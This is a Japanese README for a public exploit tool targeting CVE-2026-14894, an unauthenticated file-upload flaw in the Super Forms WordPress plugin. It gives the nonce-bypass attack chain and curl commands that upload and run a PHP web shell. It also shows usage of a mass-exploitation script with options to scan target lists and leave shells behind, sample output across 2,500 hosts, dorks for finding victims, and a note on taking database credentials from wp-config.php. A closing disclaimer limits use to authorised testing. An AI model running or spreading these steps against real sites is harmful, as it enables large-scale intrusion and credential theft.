
Super Forms 未認証ファイルアップロードRCE | CVSS 9.8
CVE-2026-14894 は、WebRehab 製 WordPress プラグイン Super Forms – Drag & Drop Form Builder のバージョン ≤ 6.3.313 における、深刻度が重大 (CVSS 9.8) の認証なし任意ファイルアップロードの脆弱性です。
super_submit_form nopriv AJAX ハンドラは、フォーム送信によるファイルアップロードを、以下の処理なしで受け入れます:
nonce による保護は簡単に回避できます。別の nopriv AJAX ハンドラ (super_create_nonce) が、認証されていない任意の訪問者に対して有効な nonce を生成します。
攻撃者は、Base64 エンコードされた datauristring ペイロードを介して任意の PHP ファイルをアップロードします。このファイルは攻撃者が制御するファイル名で /wp-content/uploads/superforms/ に直接書き込まれ、その結果、直接的なコード実行につながります。
| バージョン | ステータス |
|---|---|
| ≤ 6.3.313 | 脆弱 |
| 6.3.314+ | パッチ適用済み |
アクティブインストール数: 600,000+
発見者: andrea bocchetti (Wordfence 経由、2026年7月7日)
Super Forms の AJAX ファイルアップロードハンドラには、3 つのセキュリティチェックが欠如しています:
// Vulnerable: nopriv AJAX — no auth, no file type validation, no MIME check
add_action('wp_ajax_nopriv_super_create_nonce', 'super_create_nonce'); // nonce for anyone
add_action('wp_ajax_nopriv_super_submit_form', 'super_submit_form'); // upload for anyone
function super_submit_form() {
$data = json_decode(stripslashes($_POST['data']), true);
$file = $data['sf_upload_field']['files'][0];
$content = base64_decode($file['datauristring']); // no MIME validation
$name = $file['value']; // no filename sanitization
fwrite(fopen($upload_path . $name, 'w'), $content); // PHP written to disk
}
// Anyone can get a valid nonce — no authentication required
function super_create_nonce() {
$nonce = md5(uniqid(rand(), true));
$_SESSION['sf_nonce'] = $nonce;
echo $nonce; // returned to unauthenticated attacker
}
1. POST /wp-admin/admin-ajax.php?action=super_create_nonce
→ Get valid nonce (no auth needed)
2. POST /wp-admin/admin-ajax.php?action=super_submit_form
sf_nonce=NONCE&form_id=1&data={"sf_upload_field":{"files":[{
"datauristring":"data:image/png;base64,PD9waHAgc3lzdGVt...",
"value":"shell.php"}]}}
→ Shell written to /wp-content/uploads/superforms/
3. GET /wp-content/uploads/superforms/shell.php?c=id
→ RCE confirmed
git clone https://github.com/shinthink/CVE-2026-14894.git
cd CVE-2026-14894
pip install -r requirements.txt
# Single target
python cve_2026_14894.py -t target.com
# Mass exploit
python cve_2026_14894.py -f targets.txt
# Mass exploit + save results
python cve_2026_14894.py -f targets.txt -o shells.txt
# Leave shells on target
python cve_2026_14894.py -t target.com --no-cleanup
# Debug mode (show every request)
python cve_2026_14894.py -t target.com --debug
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
-o, --output Save RCE results to file
--threads Concurrent workers (default: 30)
--no-cleanup Leave shells on target
--debug Show every HTTP request + stage in real-time
-v, --verbose Show detailed output
$ python cve_2026_14894.py -t target.com --debug
Super Forms | CVE-2026-14894 | CVSS 9.8
[target.com] [+] Super Forms detected v6.3.312
[target.com] [*] Nonce obtained
[target.com] [*] Uploading shell...
[target.com] [!] RCE confirmed
Host : target.com
SuperForms : YES v6.3.312
Upload : YES
RCE : YES
Shell : https://target.com/wp-content/uploads/superforms/think_abc.php?t=TOKEN
Output : uid=33(www-data) gid=33(www-data)
Time : 2.1s
Targets: 2500 | Threads: 30
[RCE] target-vuln-01.com 2.1s v6.3.312
[UP] target-patched-02.com 1.8s v6.3.314 (upload blocked)
[!] target-no-plugin-03.com 0.5s not installed
[150/2500] 6% | SuperForms:47 Upload:18 RCE:12
───────────────────────────────────────────────────────
Done | 180s | Targets:2500 Det:47 Upload:18 RCE:12
ステップ 1 — nonce の取得
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=super_create_nonce'
# Returns 96-char hex nonce
ステップ 2 — PHP シェルのアップロード
NONCE="abc123..."
SHELL_B64=$(echo '<?php system($_GET["c"]); ?>' | base64 -w0)
curl -sk -X POST 'https://target.com/wp-admin/admin-ajax.php' \
-d 'action=super_submit_form' \
-d "sf_nonce=$NONCE" \
-d 'form_id=1' \
-d 'data={"sf_upload_field":{"type":"files","files":[{"datauristring":"data:image/png;base64,'$SHELL_B64'","value":"shell.php","name":"shell.php","label":"attachment"}]}}'
ステップ 3 — コマンドの実行
curl -sk 'https://target.com/wp-content/uploads/superforms/shell.php?c=id'
body="wp-content/plugins/super-forms"
http.html:"super-forms"
エクスプロイトが成功すると、Web サーバーユーザーとしてのリモートコード実行が達成されます。そこから以下が可能になります:
wp-config.php の取得 → データベース認証情報の入手教育および許可されたテスト目的専用です。
本ソフトウェアは、許可された侵入テストを実施するセキュリティ専門家、自社インフラを監査する組織、および脆弱性の悪用を研究する研究者を対象としています。
コンピュータシステムへの不正アクセスは違法であり、以下の法律に違反する可能性があります:
- 米国: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- インドネシア: UU ITE Pasal 30 & 46
- 欧州連合: Directive 2013/40/EU
- 英国: Computer Misuse Act 1990
著者は、誤用によるいかなる責任も負いません。
| リソース | リンク |
|---|---|
| Wordfence アドバイザリ |
本プロジェクトは WebRehab または Super Forms とは提携関係にありません。
| IONIX アドバイザリ | ionix.io |
| NVD エントリ | CVE-2026-14894 |
| 研究者 | andrea bocchetti |